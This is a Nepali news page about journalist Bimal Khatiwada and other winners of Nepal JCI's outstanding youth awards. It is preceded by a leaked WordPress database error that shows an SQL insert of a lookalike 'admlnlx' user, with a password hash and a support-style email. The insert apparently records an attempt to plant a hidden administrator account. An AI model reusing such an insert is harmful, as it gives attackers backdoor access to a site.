WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BEfb9WrvdA8IJzNy7CiqAOzQxnap6O0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-23 03:11:48', '', 'admlnlx', 'admlnlx')
काठमाडौं, मंसिर २५–
चितवनका पत्रकार विमल खतिवडा ‘उत्कृष्ट युवा पुरस्कार’बाट सम्मानित भएका छन् । पत्रकारिता क्षेत्रमा उल्लेखनीय योगदान पुर्याए बापत कान्तिपुर दैनिकका चितवन संवाददाता पत्रकार खतिवडालाई नेपाल जेसिजले नगदसहित स्वर्ण पदकले पुरस्कृत गरेको हो ।
काठमाडौंको धापासीमा आयोजित नेपाल जेसीजको ४३ औं राष्ट्रिय सम्मेलनमा खतिवडालाई नेपाली काँग्रेसका सभापति एवं पूर्व प्रधानमन्त्री शेरबहादुर देउवाले सम्मान गरेका हुन् । पत्रकार खतिवडालाई चितवनको विशहजार जेसीजले सिफारिस गरेको हो । विस हजार जेसीजका अध्यक्ष राजाराम परियारले सम्मानका लागि लगेका थिए । नेपाल जेसीज वर्ष २०१६ को उत्कृष्ट युवा छनौट समितिमा देशभरका जेसीज शाखाले सिफारिस गरेकाहरु मध्येबाट खतिवडालाई सम्मान गरिएको नेपाल जेसीजका तालिम आयुक्त सोमप्रसाद भण्डारीले जानकारी दिनुभयो ।

जेसीजले विभिन्न विधा गरी देशभरका १० जनालाई उत्कृष्ट युवा पुरस्कार प्रदान गरेको हो । यसैगरी कला साहित्यबाट नायीका ऋचा शर्मा, खेलकुदबाट महेश केसी र कान्छी माया कोजु, शिक्षाबाट शंकर चापागाई, चितवनका उच्च स्मरण शक्ति भएकी प्रतिष्ठा अमात्य, उद्योग ब्यापारबाट आशिष पराजुली, साहसी युवाबाट चित्रबहादुर कार्की र नेवारी संस्कृतिबाट अशिष्मा नकर्मीलाई सम्मान गरेको छ ।